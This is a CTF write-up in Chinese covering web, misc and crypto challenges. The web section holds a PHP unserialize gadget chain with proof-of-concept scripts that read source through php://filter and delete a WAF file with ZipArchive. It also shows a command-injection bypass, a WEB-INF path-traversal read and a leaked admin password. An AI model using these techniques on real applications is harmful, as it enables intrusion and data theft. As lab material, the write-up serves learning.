概述
web
little_trick
非常简单的命令执行绕过
substr(0,-1)从最后开始过,
echo`nl%20*`;
梦里花开牡丹亭
<?php
// Challenge entry script (CTF specimen). highlight_file(__FILE__) prints this file's own
// source to whoever requests the page.
highlight_file(__FILE__);
// Disables PHP error reporting for the rest of the request, so warnings raised further
// down (for example by type misuse) are not reported.
error_reporting(0);
// Loads shell.php, whose contents are not shown on this page. Open::open() below calls a
// function named shell() that is not defined in this file; presumably it comes from here.
include('shell.php');
/**
 * State object of the challenge. When an instance is rebuilt by unserialize(),
 * __wakeup() stores a handler object in $choice and __destruct() later calls it.
 *
 * NOTE(review): every property is public and nothing in this class validates types or
 * values, so all of them are controlled by whoever supplies the serialized data.
 */
class Game{
public $username;
public $password;
public $choice;
public $register;
public $file;
public $filename;
public $content;
// Defaults applied only when the object is created with `new`; unserialize() does not run
// the constructor, so values carried in the serialized data are what the methods below see.
public function __construct()
{
$this->username='user';
$this->password='user';
}
// Called automatically by PHP right after unserialize() has restored the properties.
public function __wakeup(){
// 21232f297a57a5a743894a0e4a801fc3 is md5('admin').
if(md5($this->register)==="21232f297a57a5a743894a0e4a801fc3"){
// $file, $filename and $content are handed to the login handler unchanged.
$this->choice=new login($this->file,$this->filename,$this->content);
}else{
$this->choice = new register();
}
}
// Called when the object is destroyed; delegates to whichever handler __wakeup() selected.
public function __destruct() {
$this->choice->checking($this->username,$this->password);
}
}
/**
 * Handler that Game::__wakeup() instantiates when the register check passes.
 *
 * It only stores the three values it is given and, for the admin/admin pair,
 * forwards two of them to $file->open().
 *
 * NOTE(review): $file is never type-checked, so open() is invoked on whatever
 * object was supplied; an `instanceof Open` check would pin the intended target.
 */
class login
{
    public $file;
    public $filename;
    public $content;

    /**
     * @param mixed $file     Object whose open() method checking() will call.
     * @param mixed $filename First argument passed to open().
     * @param mixed $content  Second argument passed to open().
     */
    public function __construct($file, $filename, $content)
    {
        $this->file = $file;
        $this->filename = $filename;
        $this->content = $content;
    }

    /**
     * Calls $file->open() and terminates the script when both credentials are
     * exactly the string 'admin'; otherwise does nothing and returns null.
     */
    public function checking($username, $password)
    {
        // Guard clause: anything other than admin/admin falls straight through.
        if ($username !== 'admin' || $password !== 'admin') {
            return;
        }

        $this->file->open($this->filename, $this->content);
        die('login success you can to open shell file!');
    }
}
/**
 * Fallback handler that Game::__wakeup() instantiates when the register check fails.
 * checking() always terminates the script with one of two messages.
 */
class register
{
    /**
     * Ends the request, reporting whether both credentials equal 'admin'.
     */
    public function checking($username, $password)
    {
        $isAdmin = ($username === 'admin' && $password === 'admin');

        die($isAdmin ? 'success register admin' : 'please register admin ');
    }
}
/**
 * Helper whose open() method is called from login::checking().
 *
 * NOTE(review): both arguments come from properties restored by unserialize(). The only
 * guard in front of shell() is whether waf.txt can be read as a non-empty value, and the
 * read path is built from $filename without an allowlist or a check for stream wrappers.
 */
class Open{
// $filename: base name to read (".php" is appended); $content: value passed to shell().
function open($filename, $content){
// file_get_contents() yields a falsy value when waf.txt is missing, unreadable or empty;
// only in that case is $content passed to shell(), which is defined outside this file.
if(!file_get_contents('waf.txt')){
shell($content);
}else{
// Otherwise the raw contents of "$filename.php" are echoed to the response.
echo file_get_contents($filename.".php");
}
}
}
// Gate: the GET parameters 'a' and 'b' must differ while md5() and sha1() of both are identical.
// NOTE(review): neither parameter is checked with is_string() first, so the comparison does
// not by itself prove a real hash collision; validate the type before hashing.
// NOTE(review): unserialize() runs on client-supplied POST data, which lets the client choose
// which loaded classes get instantiated and with which property values. Prefer json_decode(),
// or pass ['allowed_classes' => false] as the second argument. The @ also hides any warning.
if($_GET['a']!==$_GET['b']&&(md5($_GET['a']) === md5($_GET['b'])) && (sha1($_GET['a'])=== sha1($_GET['b']))){
@unserialize(base64_decode($_POST['unser']));
}
这个代码的链不难找
Game::__wakeup -> Game::__destruct -> login::checking -> Open::open
先看看shell.php里是些什么东西
exp1
<?php
// Writeup proof-of-concept, step 1: builds a Game object locally and prints it serialized
// and base64-encoded. The class and property names mirror the challenge source so that the
// server's unserialize() maps the data onto its own classes.
// Defensive reading: this only has an effect because the server unserializes client data
// and then calls ->open() with a path taken from that data.
class Game{
public $username;
public $password;
public $choice;
public $register;
public $file;
public $filename;
public $content;
public function __construct()
{
// The values login::checking() compares against on the server.
$this->username='admin';
$this->password='admin';
// md5('admin') is the constant Game::__wakeup() compares md5($register) with.
$this->register='admin';
$this->file=new Open();
// The server appends ".php" and echoes the result of file_get_contents(); with this
// stream-wrapper path the output is a base64 copy of shell.php's source.
$this->filename="php://filter/read=convert.base64-encode/resource=shell";
// Only reaches shell() on the server when waf.txt cannot be read (see Open::open()).
$this->content="ls";
}
}
// Empty stand-ins: only the class names matter for the serialized output.
class login{
public $file;
public $filename;
public $content;
}
class Open{
}
// $b is never used afterwards (PHP class names are case-insensitive, so this is the stub above).
$b = new Login();
$c = new Game();
echo base64_encode(serialize($c));
?>
发现里面有个命令执行绕过
而想要调用shell函数就必须要让waf.txt不存在
搜索发现可以用原生类的同名函数open来进行删除
原生类讲解
ZipArchive::open
这个类可以将文件覆盖删除
exp2
<?php
// Writeup proof-of-concept, step 2: same object layout as before, but $file is an instance
// of PHP's built-in ZipArchive, which also has a method named open().
// Defensive reading: login::checking() calls ->open() on an unchecked object, so any loaded
// class with that method name can be substituted. An `instanceof Open` check on the server,
// or unserialize() with a restricted 'allowed_classes' list, removes this option.
class Game{
public $username;
public $password;
public $choice;
public $register;
public $file;
public $filename;
public $content;
public function __construct()
{
$this->username='admin';
$this->password='admin';
// md5('admin') is the constant Game::__wakeup() compares md5($register) with.
$this->register='admin';
$this->file=new ZipArchive();
// Becomes the first argument of ZipArchive::open() on the server.
$this->filename="waf.txt";
// Becomes the flags argument; the writeup relies on OVERWRITE to get rid of waf.txt.
$this->content=ZIPARCHIVE::OVERWRITE;
}
}
// Empty stand-ins: only the class names matter for the serialized output.
class login{
public $file;
public $filename;
public $content;
}
class Open{
}
// $b is never used afterwards.
$b = new Login();
$c = new Game();
echo base64_encode(serialize($c));
?>
此时waf.txt已经删除
再命令执行绕过即可
nl /flag
fake_revenge
下载下来发现是ThinkPHP框架,直接用payload打
发现禁了一些函数
发现能用passthru
cat flag即可
easy_tomcat
进去发现要登录
测试一波弱密码,sql注入,无果,扫下目录
注册登录
发现head_path参数,也许存在任意文件读取
用绝对路径配合绕过
static/img/../../WEB-INF/web.xml
而网页注释写了尝试admin
读取LoginServlet.class,base64解码是这些玩意,看看InitServlet这个初始化
看到admin密码
admin/no_one_knows_my_password_75767388428345
进去发现有之前登陆的账号,并且可以删除
发现他传的是json的东西,而之前读取AdminServlet文件内容时,里面刚好有fastjson的东西
vn前不久刚出
https://blog.csdn.net/SopRomeo/article/details/114945759?spm=1001.2014.3001.5501
绕过都没有
misc
签到
将数据循环二进制输出即可
# -*- coding: utf-8 -*-
# @File : test
# @Author : penson <penson@penson.top>
# @Email: decentpenson@gmail.com
# @Date : 2021/3/20 10:58
flag =[0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffff9ffffffffffff,0xfffffffffffffffffff5f0001fffffff,0xfffffffffffffffe000407ffcfffffff,0xfffffffffffffff8fffffffff7ffffff,0xfffffffffffffff3fffffffff3ffffff,0xffffffffffffffcffffffffffbffffff,0xffffffffffffffdffffffffffbfffff
f,0xffffffffffffffdffffffffffbffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffcffffff,0xfffffffffffffffffffffffffcffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffff0000ffffffffffff,0xfffffffffffffffe7fff1f9fffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffe1fffffffffffdffffffffffff,0xffffff8cfffffffffffdffffffffffff,0xfff03fbf7ffffffffffbffffffffffff,0xffe79f3f3ffffffffffbffffffffffff,0xffefde7fbffffffffffbffffffffffff,0xffefeeff9ffffffffffbffffffffffff,0xffefe6ffdffffffffff9ffffffffffff,0xffcff6ffdffffffffffcffffffffffff,0xffdffaffcffffffffffe3fffffffffff,0xffdff8ffefffffffffff800fffffffff,0xffdff9ffefffffffffff0fffffffffff,0xffdffdffeffffffffffc7fffffffffff,0xffdffffff7fffffffff3ffffffffffff,0xffdffffff7fffffffff7ffffffffffff,0xffdffffff7ffffffffffffffffffffff,0xffdfff9fffffffffffffff7fffffffff,0xffffffbfffffffffffffff3fffffffff,0xffffff7ffffffffffffc1fbfffffffff,0xffffff7ffffffffffff9df9fffffffff,0xffffff7ffffffffffffbdfdfffffffff,0xffffff7ffffffffffffbdfdfffffffff,0xffffff9ffffffffffffbdf9fffffffff,0xffffffcffffffffffffbdfbfffffffff,0xffffffe3fffffffffffbdfbfffffffff,0xffffffc007fffffffffbdf3fffffffff,0xffffff1f83fffffffff9df7fffffffff,0xfffffe7ffffffffffffcdcffffffffff,0xfffffefffffffffffffe01ffffffffff,0xffffffffffffffffffffdfffffffffff,0xffffffffffffffffffffdfffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffff3ffffffffffffffffffffff,0xfffffff3e7ffffffffffffffffffffff,0xffffffc78ffffffffff8ffffffffffff,0xffffffb03fffffffffff3fffffffffff,0xffffff23ffffffffffff87ffffffffff,0xffffff787ffffffffffff0ffffffffff,0xffffff7f9ffffffffffffc7fffffffff,0xf
fffff7fc7fffffffffff1ffffffffff,0xffffff7ff3ffffffffffc7ffffffffff,0xffffffbffbffffffffff1fffffffffff,0xffffffcffbfffffffffcffffffffffff,0xffffffe7e7ffffffffe1ffffffffffff,0xfffffff80fffffffffefffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffe3ffffffffff,0xfffffffffffffffff01f89ffffffffff,0xffffffffffffffffc7cf3cffffffffff,0xffffffffffffffff9fee7effffffffff,0xfffffffffbffffff3ff6feffffffffff,0xfffffffffbffffff7ff2fe7fffffffff,0xfffffffffbffffff7ffaff7fffffffff,0xfffffffffbfffffefff8ff7fffffffff,0xfffffffffbfffffefffcff7fffffffff,0xfffffffffbfffffefffcff3fffffffff,0xfffffffffbfffffefffcffbfffffffff,0xfffffffffbfffffeffffffbfffffffff,0xfffffffffbffffffffffffbfffffffff,0xfffffffffbffffffffffffbfffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbfffffc00ffffffffffffff,0xfffffffffbfffffbff00001fffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffffffffffffdfcffffffffff,0xfffffffffffffffffffbfeffffffffff,0xfffffffffffffffffff3fe7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffe1ffffffffff7ff7fffffffff,0xfffffff0fffffffffff7ff7fffffffff,0xffffff8ffffffffffff7feffffffffff,0xfffffff3fffffffffff9f0ffffffffff,0xfffffffcfffffffffffe07ffffffffff,0xfffffffe7fffffffffffffffffffffff,0xffffffff7fffffffffffffffffffffff,0xffffffffbfffffffffffffffffffffff,0xffffffffbfffffffffffffffffffffff,0xffffffff7fffffffffffffffffffffff,0xfffffffe7fffffffffffffffffffffff,0xffffffc0ffffffffffffffffffffffff,0xffffff
fffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xff8001fffffffffffffffff7ffffffff,0xffbffc00fffffffffffffff7ffffffff,0xff7ffffe1ffffffffffffff7ffffffff,0xff7fffffcffffffffffffff7ffffffff,0xff7fffffe7fffffffffffff7ffffffff,0xff3ffffff3fffffffffffff7ffffffff,0xffbffffffbfffffffffffff7ffffffff,0xff7ffffff3fffffffffffff7ffffffff,0xff83ffffe7fffffffffffff7ffffffff,0xfff83fffcffffffffffffff7ffffffff,0xffff80003ffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xffbffffffffffffffffffff7ffffffff,0xff9ffffffffffffffffffff7ffffffff,0xffdffffffffffffffffffff7ffffffff,0xffeffffffffffffffffffff7ffffffff,0xffeffffffffffffffffffff7ffffffff,0xfff7fffffffffffffffffff7ffffffff,0xfff7fffffffffffffffffff7ffffffff,0xfffbfffffffffffffffffff7ffffffff,0xfff9fffffffffffffffffff7ffffffff,0xfffdfffffffffffffffffff7ffffffff,0xfffcfffffffffffffffffff7ffffffff,0xfffefffffffffffffffffff7ffffffff,0xfffe7ffffffffffffffffff7ffffffff,0xffff3ffffffffffffffffff7ffffffff,0xffffbfffffffffffffffffffffffffff,0xffffbfffffffffffffffffffffffffff,0xffff9f003fffffffffffffffffffffff,0xffffc07f83ffffffffffffffffffffff,0xffff9fffffffffff8000001fffffffff,0xffff3fffffffffff3fffffcfffffffff,0xfffe7ffffffffffe7fffffe7ffffffff,0xfffcfffffffffffcfffffff3ffffffff,0xfff9fffffffffffc1ffffff3ffffffff,0xfff3fffffffffffe7fffffc7ffffffff,0xffe7ffffffffffff03ffe01fffffffff,0xffdffffffffffffff8000fffffffffff,0xff3fffffffffffffffffffffffffffff,0xfe7fffffffffffffffffffffffffffff,0xf8ffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffefffe03ffffffffff,0xffffffffffffffff7ffcf8ffffffffff,0xfbffffffffffffff7ff9feffffffffff,0xf3ffffffffffffff7ff3ff7fffffffff,0xe7fffffffff
fffffbff7ffbfffffffff,0xefffffffffffffffbff7ffbfffffffff,0xefffffffffffffffbff7ffdfffffffff,0xeffffffffcffffffbff7ffdfffffffff,0xeffffffffeffffffbff7ffdfffffffff,0xe7fffc0ffeffffffbff7ffcfffffffff,0xf3fff9e07effffffbff7ffefffffffff,0xf80017ff80ffffffbff7ffefffffffff,0xffffd7ffffffffff0037ffefffffffff,0xffffc7ffffffffffffc3ffefffffffff,0xffffefffffffffffffffffefffffffff,0xffffefffffffffffffffffcfffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffe03fffffffffffffffffffffffff,0xffffcf9fffffffffffffffffffffffff,0xffff9fdffffffffffffffff7ffffffff,0xffffbfdffffffffffffffff7ffffffff,0xffffbfcffffffffffffffff7ffffffff,0xffff3feffffffffffffffff7ffffffff,0xffff7feffffffffffffffff7ffffffff,0xffff7feffffffffffffffff7ffffffff,0xffff000000007ffffffffff7ffffffff,0xffffbffffffe7ffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xffffffdffffffffffffffff7ffffffff,0xffffffcffffffffffffffff7ffffffff,0xffff07effffffffffffffff7ffffffff,0xffff73effffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff9bcffffffffffffffff7ffffffff,0xffffc3dffffffffffffffff7ffffffff,0xfffff01ffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfcfffffffffffffffffffff7ffffffff,0xfe1ffffffffffffffffffff7ffffffff,0xffe0fffffffffffffffffff7ffffffff,0xfffe07fffffffffffffffff7ffffffff,0xfffff00ffffffffffffffff7ffffffff,0xffffffeffffffffffffffff7ffffffff,0xffffff8ffffffffffffffff7ffffffff,0xfffffe3ffffffffffffffff7ffffffff,0xfffff8ffffffffffffffffffffffffff,0xffffe3ffffffffffffffffffffffffff,0xfffe1fffffffffffffffffffffffffff,0xffc0ffffffffffffffffffffffffffff,0xfc1fffffffffffffffffffffffffffff,0xfc7fffffffffffff
ffffffffffffffff,0xff807fffffffffffffffffffffffffff,0xffff01ffffffffffffffffffffffffff,0xfffffc07ffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff]
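# NOTE: in this copy of the script the `flag` list above is hard-wrapped in the middle of
# several hex literals; rejoin those lines before running.
# Unused below; kept so the script still defines the same module-level names.
test = ""
# Each value is printed as one row of bits, so the rows together form a bitmap.
# Zero-padding to the widest value keeps the columns aligned even if a value's
# leading bits are zero (a plain "{:b}" would print a shorter, shifted row).
row_width = max(v.bit_length() for v in flag) if flag else 0
for i in flag:
    print("{:0{}b}".format(i, row_width))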
看图识字
出题人日记
改为zip后发现字符
凯撒密码
搜索js图片隐写
js隐写
js隐写工具下载
解密这个图即可
crypto
Real_Base
身为一个web选手,第一次做出了这种密码题还是挺开心的。虽然这题不难,题目给出了base64变种加密的源码,其实只要分析base64编码的原理,再去看它的代码,就很容易写出对应的解密脚本
我已经在源代码里写了分析
# -*- coding: utf-8 -*-
# @File : RealBase
# @Author : penson <penson@penson.top>
# @Email: decentpenson@gmail.com
# @Date : 2021/3/21 19:34
# py2
import string
import random
# from secret import flag, b_char
# Quick look at str.zfill: left-pads with '0' up to a width of 10, printing 0000123456.
print('123456'.zfill(10))
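def encode(s, alphabet=None):
    """Encode *s* with base64's bit layout and a custom 64-character alphabet.

    Every 3 input characters (24 bits) become 4 output characters, each one
    selected by a 6-bit index into the alphabet. A trailing group of 1 or 2
    characters is zero-padded, yields 2 or 3 output characters, and is
    completed with '=' so the output length stays a multiple of 4.

    Args:
        s: Text whose characters all have code points below 256.
        alphabet: 64-character lookup table. Defaults to the module-level
            ``b_char`` so existing ``encode(s)`` calls keep working.

    Returns:
        The encoded string; ``''`` for empty input.

    Raises:
        ValueError: If a character does not fit in 8 bits.
    """
    if alphabet is None:
        alphabet = b_char

    # One 8-character bit string per input character.
    bits = []
    for ch in s:
        code = ord(ch)
        if code > 0xFF:
            # A wider code point would silently shift every following 6-bit group.
            raise ValueError("encode() only handles 8-bit characters")
        bits.append(format(code, '08b'))

    full_groups, leftover = divmod(len(bits), 3)
    out = []
    for g in range(full_groups):
        chunk = ''.join(bits[g * 3:g * 3 + 3])
        # Four 6-bit groups; each value is an index into the alphabet.
        out.extend(alphabet[int(chunk[k:k + 6], 2)] for k in (0, 6, 12, 18))

    if leftover:
        # Zero-pad the 1- or 2-character tail to 24 bits, keep only the 6-bit
        # groups that carry data, then add the '=' markers.
        chunk = ''.join(bits[full_groups * 3:]) + '0' * 8 * (3 - leftover)
        sextets = [chunk[k:k + 6] for k in (0, 6, 12, 18)][:leftover + 1]
        out.extend(alphabet[int(x, 2)] for x in sextets)
        out.append('=' * (3 - leftover))

    return ''.join(out)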
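def decode(m, alphabet=None):
    """Decode text produced by ``encode`` and print the recovered plaintext.

    '=' padding is stripped, every remaining character is mapped to its 6-bit
    index in the alphabet, and the resulting bit stream is cut into 8-bit
    characters. Input of any length is handled, and bytes 0x00 and 0x01 are
    decoded like any other value.

    Args:
        m: Encoded text. Characters that are not in the alphabet are skipped,
            as in the original implementation.
        alphabet: 64-character lookup table. Defaults to the module-level
            ``b_char`` so existing ``decode(m)`` calls keep working.

    Returns:
        The decoded string. It is also printed, which is how the script
        reports its result.
    """
    if alphabet is None:
        alphabet = b_char

    # One dictionary lookup per character instead of scanning the alphabet.
    index_of = {ch: idx for idx, ch in enumerate(alphabet)}
    bits = ''.join(
        format(index_of[ch], '06b')
        for ch in m.replace('=', '')
        if ch in index_of
    )

    # Only complete 8-bit groups are data; any 2 or 4 left-over bits are the
    # zero padding added by the encoder.
    flag = ''.join(
        chr(int(bits[pos:pos + 8], 2)) for pos in range(0, len(bits) - 7, 8)
    )
    print(flag)
    return flag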
# 64-symbol alphabet read by encode() and decode(): lowercase letters, digits,
# uppercase letters, then '+' and '/'. Position in this string is the 6-bit value.
b_char = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/"
# Sample input used to exercise encode(); the result `m` is not used afterwards.
m1='rTcb1BR8YVW2EOUjweXpIiLt5QCNg7ZAsD9muq3ylMhvofnx/P'
# print len(m1)
m = encode(m1)
# Decodes the string below and prints the plaintext (presumably the challenge's ciphertext).
decode("tCvM4R3TzvZ7nhjBxSiNyxmP28e7qCjVxQn91SRM3gBKzxQ=")
# Leftover experiments from working out the scheme:
# print encode(flag)
# print len("rTcb1BR8YVW2EOUjweXpIiLt5QCNg7ZAsD9muq3ylMhvofnx/P")
# print len("2Br9y9fcu97zvB2OruZv0D3Bwhbj0uNQnvfdtC2TwAfPrdBJ3xeP4wNn0hzLzCVUlRa=")
# tCvM4R3TzvZ7nhjBxSiNyxmP28e7qCjVxQn91SRM3gBKzxQ=